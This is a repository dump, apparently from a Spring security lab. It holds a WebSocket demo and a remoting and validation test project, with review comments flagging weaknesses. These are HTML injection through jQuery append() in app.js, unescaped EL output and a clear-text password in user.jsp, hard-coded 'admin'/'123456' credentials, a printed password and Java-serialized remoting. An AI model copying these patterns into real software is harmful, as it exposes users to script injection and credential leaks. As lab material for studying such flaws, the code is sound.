demo; main hands the command-line arguments to SpringApplication.run. */ @SpringBootApplication 7 | public class DemoApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(DemoApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/src/main/java/com/example/demo/ProtocolBufferSocketHandler.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.stereotype.Component; 4 | import org.springframework.web.socket.BinaryMessage; 5 | import org.springframework.web.socket.WebSocketSession; 6 | import org.springframework.web.socket.handler.BinaryWebSocketHandler; 7 | 8 | /** 9 | * Non-binary messages are not supported; see the handleTextMessage method of BinaryWebSocketHandler for details.
10 | * BinaryWebSocketHandler.handleTextMessage can also be overridden to customise the error message. 11 | */ 12 | @Component 13 | public class ProtocolBufferSocketHandler extends BinaryWebSocketHandler { 14 | /** Delegates to the superclass unchanged; no payload decoding happens in this class. */ @Override 15 | protected void handleBinaryMessage(WebSocketSession session, BinaryMessage message) throws Exception { 16 | super.handleBinaryMessage(session, message); 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/src/main/java/com/example/demo/WebSocketConfig.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.context.annotation.Configuration; 4 | import org.springframework.web.socket.config.annotation.EnableWebSocket; 5 | import org.springframework.web.socket.config.annotation.WebSocketConfigurer; 6 | import org.springframework.web.socket.config.annotation.WebSocketHandlerRegistry; 7 | 8 | /** Registers the three WebSocket handlers of the demo on the paths /name, /protobuf and /binary. NOTE(review): no handshake interceptor, allowed-origin setting or authentication is configured in this class, so access control depends on the framework defaults and on whatever is configured elsewhere; confirm before exposing these endpoints beyond a lab network. The handlers are created with new, so the registered instances are not the container-managed beans even though two of the handler classes carry the Component annotation. */ @Configuration 9 | @EnableWebSocket 10 | public class WebSocketConfig implements WebSocketConfigurer { 11 | public void registerWebSocketHandlers(WebSocketHandlerRegistry registry) { 12 | registry.addHandler(new SocketHandler(), "/name"); 13 | registry.addHandler(new ProtocolBufferSocketHandler(), "/protobuf"); 14 | registry.addHandler(new BinarySocketHandler(), "/binary"); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.address=10.128.5.250 2 | server.port=8089 3 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/src/main/resources/static/app.js: -------------------------------------------------------------------------------- 1 | 2 | var ws; 3 | function setConnected(connected) { 4 | $("#connect").prop("disabled",
connected); 5 | $("#disconnect").prop("disabled", !connected); 6 | if (connected) { 7 | $("#conversation").show(); 8 | } 9 | else { 10 | $("#conversation").hide(); 11 | } 12 | $("#greetings").html(""); 13 | } 14 | 15 | /* Opens a WebSocket to the hard-coded endpoint, routes every incoming frame to showGreeting and switches the UI to the connected state. NOTE(review): the plain ws scheme is unencrypted, so traffic can be read or altered on the network path; the TLS variant (wss) is the choice outside an isolated lab, and the fixed private address ties the page to one host. */ function connect() { 16 | ws = new WebSocket('ws://10.128.5.250:8089/name'); 17 | ws.onmessage = function(data){ 18 | showGreeting(data.data); 19 | } 20 | setConnected(true); 21 | } 22 | 23 | /* Closes the socket when one exists and switches the UI back to the disconnected state. */ function disconnect() { 24 | if (ws != null) { 25 | ws.close(); 26 | } 27 | setConnected(false); 28 | console.log("Disconnected"); 29 | } 30 | 31 | /* Sends the value of the #name field to the server as a JSON object with a single name key. */ function sendName() { 32 | var data = JSON.stringify({'name': $("#name").val()}) 33 | ws.send(data); 34 | } 35 | 36 | /* Appends the received message to #greetings. NOTE(review): jQuery's append() parses a string argument as HTML when it contains markup, so markup inside a server message is interpreted by the browser; creating the element first and filling it with text() keeps the message as plain text. */ function showGreeting(message) { 37 | $("#greetings").append(" " + message + ""); 38 | } 39 | 40 | /* On DOM ready: stops the form from submitting and binds the connect, disconnect and send buttons. */ $(function () { 41 | $("form").on('submit', function (e) { 42 | e.preventDefault(); 43 | }); 44 | $( "#connect" ).click(function() { connect(); }); 45 | $( "#disconnect" ).click(function() { disconnect(); }); 46 | $( "#send" ).click(function() { sendName(); }); 47 | }); 48 | 49 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/src/main/resources/static/main.css: -------------------------------------------------------------------------------- 1 | body { 2 | background-color: #f5f5f5; 3 | } 4 | 5 | #main-content { 6 | max-width: 940px; 7 | padding: 2em 3em; 8 | margin: 0 auto 20px; 9 | background-color: #fff; 10 | border: 1px solid #e5e5e5; 11 | -webkit-border-radius: 5px; 12 | -moz-border-radius: 5px; 13 | border-radius: 5px; 14 | } -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | server.address=10.128.5.250 2 | server.port=8089 3 | --------------------------------------------------------------------------------
/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/BinarySocketHandler.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/BinarySocketHandler.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/DemoApplication.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/ProtocolBufferSocketHandler.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/ProtocolBufferSocketHandler.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/SocketHandler.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/SocketHandler.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/WebSocketConfig.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/classes/com/example/demo/WebSocketConfig.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/target/classes/static/app.js: -------------------------------------------------------------------------------- 1 | 2 | var ws; 3 | function setConnected(connected) { 4 | $("#connect").prop("disabled", connected); 5 | $("#disconnect").prop("disabled", !connected); 6 | if (connected) { 7 | $("#conversation").show(); 8 | } 9 | else { 10 | $("#conversation").hide(); 11 | } 12 | $("#greetings").html(""); 13 | } 14 | 15 | function connect() { 16 | ws = new WebSocket('ws://10.128.5.250:8089/name'); 17 | ws.onmessage = function(data){ 18 | showGreeting(data.data); 19 | } 20 | setConnected(true); 21 | } 22 | 23 | function disconnect() { 24 | if (ws != null) { 25 | ws.close(); 26 | } 27 | setConnected(false); 28 | console.log("Disconnected"); 29 | } 30 | 31 | function sendName() { 32 | var data = JSON.stringify({'name': $("#name").val()}) 33 | ws.send(data); 34 | } 35 | 36 | function showGreeting(message) { 37 | $("#greetings").append(" " + message + ""); 38 | } 39 | 40 | $(function () { 41 | $("form").on('submit', function (e) { 42 | e.preventDefault(); 43 | }); 44 | $( "#connect" ).click(function() { connect(); }); 45 | $( "#disconnect" ).click(function() { disconnect(); }); 46 | $( "#send" ).click(function() { sendName(); }); 47 | }); 48 | 49 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/target/classes/static/main.css: -------------------------------------------------------------------------------- 1 | body { 2 | background-color: #f5f5f5; 3 | } 4 | 5 | #main-content { 6 | max-width: 940px; 7 | padding: 2em 3em; 8 | margin: 0 auto 20px; 9 | background-color: #fff; 10 | border: 1px solid 
#e5e5e5; 11 | -webkit-border-radius: 5px; 12 | -moz-border-radius: 5px; 13 | border-radius: 5px; 14 | } -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/target/demo-0.0.1-SNAPSHOT.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/demo-0.0.1-SNAPSHOT.jar -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/target/demo-0.0.1-SNAPSHOT.jar.original: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-without-STOMP/target/demo-0.0.1-SNAPSHOT.jar.original -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/target/maven-archiver/pom.properties: -------------------------------------------------------------------------------- 1 | #Generated by Maven 2 | #Wed Jul 13 14:51:49 CST 2022 3 | version=0.0.1-SNAPSHOT 4 | groupId=com.example 5 | artifactId=demo 6 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst: -------------------------------------------------------------------------------- 1 | com/example/demo/DemoApplication.class 2 | com/example/demo/ProtocolBufferSocketHandler.class 3 | com/example/demo/WebSocketConfig.class 4 | com/example/demo/SocketHandler.class 5 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst: 
-------------------------------------------------------------------------------- 1 | /Users/dxy/Downloads/Spring-WebSocket-Demo/src/main/java/com/example/demo/SocketHandler.java 2 | /Users/dxy/Downloads/Spring-WebSocket-Demo/src/main/java/com/example/demo/ProtocolBufferSocketHandler.java 3 | /Users/dxy/Downloads/Spring-WebSocket-Demo/src/main/java/com/example/demo/WebSocketConfig.java 4 | /Users/dxy/Downloads/Spring-WebSocket-Demo/src/main/java/com/example/demo/DemoApplication.java 5 | -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Created-By: IntelliJ IDEA 3 | Built-By: dxy 4 | Build-Jdk: version 1.8.0_181 5 | 6 | -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/invoker-client.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/Controller/Client.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/Controller/Client.class -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/Controller/TestController.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/Controller/TestController.class -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/IUserService.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/IUserService.class -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/User.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/User.class -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/UserService.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/UserService.class -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/UserServiceImpl.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/example/User/UserServiceImpl.class -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/entity/Message.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/entity/Message.class -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/entity/User.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/entity/User.class -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/service/IUserService.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/service/IUserService.class -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/service/Impl/UserServiceImpl.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/org/sglab/vuln/service/Impl/UserServiceImpl.class -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/spring/invoker-client.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/WEB-INF/classes/spring/spring-remote.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/index.jsp: -------------------------------------------------------------------------------- 1 | <%-- 2 | Created by IntelliJ IDEA. 3 | User: dxy 4 | Date: 2022/12/23 5 | Time: 4:50 下午 6 | To change this template use File | Settings | File Templates. 
7 | --%> 8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %> 9 | 10 | 11 | $Title$ 12 | 13 | 14 | $END$ 15 | 16 | 17 | -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/resources/invoker-client.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/resources/spring/invoker-client.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /SpringConfigTest/out/artifacts/SpringConfigTest_war_exploded/resources/spring/spring-remote.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /SpringConfigTest/src/org/example/User/Client.java: -------------------------------------------------------------------------------- 1 | package org.example.User; 2 | 3 | import org.springframework.context.ApplicationContext; 4 | import org.springframework.context.support.ClassPathXmlApplicationContext; 5 | 6 | /** Command-line client: loads invoker-client.xml from the classpath, fetches the bean named userServiceProxy, calls getUser() on it and prints the returned username and password. NOTE(review): the file and bean names suggest a Spring remoting (HTTP invoker) proxy, but the XML content is not shown here, so confirm; that style of remoting exchanges Java-serialized objects, so the endpoint should only be reachable by trusted peers and the client should only point at a trusted server. */ public class Client { 7 | public static void main(String[] args) { 8 | // ApplicationContext context=new ClassPathXmlApplicationContext("classpath:spring/spring-remote.xml"); 9 | // IUserService userService=(IUserService) context.getBean("userService"); 10 | // User user=userService.getUser(); 11 | // System.out.println(user.getUsername()); 12 | // System.out.println(user.getPassword()); 13 | 14 | 15 | ApplicationContext context=new ClassPathXmlApplicationContext("classpath:invoker-client.xml"); 16 | IUserService userService=(IUserService)
context.getBean("userServiceProxy"); 17 | User user=userService.getUser(); 18 | System.out.println(user.getUsername()); 19 | /* NOTE(review): writes the password returned by the service to standard output, where console or log capture will retain it. */ System.out.println(user.getPassword()); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /SpringConfigTest/src/org/example/User/IUserService.java: -------------------------------------------------------------------------------- 1 | package org.example.User; 2 | 3 | /** Service contract with a single operation that returns a User. */ public interface IUserService { 4 | public User getUser(); 5 | } 6 | -------------------------------------------------------------------------------- /SpringConfigTest/src/org/example/User/User.java: -------------------------------------------------------------------------------- 1 | package org.example.User; 2 | 3 | import org.example.Validate.CaseMode; 4 | import org.example.Validate.CheckCase; 5 | import org.hibernate.validator.constraints.NotBlank; 6 | 7 | import java.io.Serializable; 8 | 9 | /** Serializable bean holding a username and a password, with plain getters and setters. Both fields carry a NotBlank constraint and username additionally carries CheckCase with CaseMode.LOWER. NOTE(review): neither field is transient, so the password is part of the default serialized form, and it is held as a plain String. */ public class User implements Serializable { 10 | @NotBlank(message = "用户名不能为空") 11 | @CheckCase(CaseMode.LOWER) 12 | private String username; 13 | 14 | @NotBlank(message = "密码不能为空") 15 | private String password; 16 | 17 | public String getUsername() { 18 | return username; 19 | } 20 | 21 | public void setUsername(String username) { 22 | this.username = username; 23 | } 24 | 25 | public String getPassword() { 26 | return password; 27 | } 28 | 29 | public void setPassword(String password) { 30 | this.password = password; 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /SpringConfigTest/src/org/example/User/UserServiceImpl.java: -------------------------------------------------------------------------------- 1 | package org.example.User; 2 | 3 | /** IUserService implementation whose getUser() builds a new User on every call and fills it with a fixed username and password. NOTE(review): the credentials are literals in the source and easy to guess; suitable as a lab fixture only. */ public class UserServiceImpl implements IUserService { 4 | 5 | public UserServiceImpl() { 6 | super(); 7 | } 8 | 9 | // @Override 10 | public User getUser() { 11 | User user = new User(); 12 | user.setUsername("admin"); 13 |
user.setPassword("123456"); 14 | return user; 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /SpringConfigTest/src/org/example/Validate/CaseMode.java: -------------------------------------------------------------------------------- 1 | package org.example.Validate; 2 | 3 | public enum CaseMode { 4 | UPPER, 5 | LOWER; 6 | } 7 | -------------------------------------------------------------------------------- /SpringConfigTest/src/org/example/Validate/CheckCase.java: -------------------------------------------------------------------------------- 1 | package org.example.Validate; 2 | 3 | import javax.validation.Constraint; 4 | import javax.validation.Payload; 5 | import java.lang.annotation.Documented; 6 | import java.lang.annotation.Repeatable; 7 | import java.lang.annotation.Retention; 8 | import java.lang.annotation.Target; 9 | 10 | import static java.lang.annotation.ElementType.ANNOTATION_TYPE; 11 | import static java.lang.annotation.ElementType.FIELD; 12 | import static java.lang.annotation.ElementType.METHOD; 13 | import static java.lang.annotation.ElementType.PARAMETER; 14 | import static java.lang.annotation.ElementType.TYPE_USE; 15 | import static java.lang.annotation.RetentionPolicy.RUNTIME; 16 | 17 | @Target({ FIELD, METHOD, PARAMETER, ANNOTATION_TYPE, TYPE_USE }) 18 | @Retention(RUNTIME) 19 | @Constraint(validatedBy = CheckCaseValidator.class) 20 | @Documented 21 | public @interface CheckCase { 22 | String message() default "{javax.validation.constraints.Matches.message}"; 23 | 24 | Class[] groups() default { }; 25 | 26 | Class[] payload() default { }; 27 | 28 | CaseMode value(); 29 | 30 | @Target({ FIELD, METHOD, PARAMETER, ANNOTATION_TYPE }) 31 | @Retention(RUNTIME) 32 | @Documented 33 | @interface List { 34 | CheckCase[] value(); 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /SpringConfigTest/web/WEB-INF/jsp/user.jsp: 
--------------------------------------------------------------------------------
<%--
  Created by IntelliJ IDEA.
  User: dxy
  Date: 2022/12/25
  Time: 2:05 PM
  To change this template use File | Settings | File Templates.
--%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%--
  NOTE(review): the two EL expressions below are written into the response as-is.
  EL in template text is not HTML-escaped, so a value that originates from request
  data should be emitted through JSTL <c:out> or fn:escapeXml instead. The page
  also echoes the password value back in clear text, which exposes it to anything
  that can read or cache the response. Where the "User" attribute is set is not
  shown in this listing.
--%>


Title


username: ${User.username}
<% out.println("
");%>
password: ${User.password}



--------------------------------------------------------------------------------
/SpringConfigTest/web/index.jsp:
--------------------------------------------------------------------------------
<%--
  Created by IntelliJ IDEA.
  User: dxy
  Date: 2022/12/23
  Time: 4:50 PM
  To change this template use File | Settings | File Templates.
--%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>


$Title$


Spring Config Test



--------------------------------------------------------------------------------
/SpringConfigTest/web/resources/invoker-client.xml:
--------------------------------------------------------------------------------
1 | 2 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 |
--------------------------------------------------------------------------------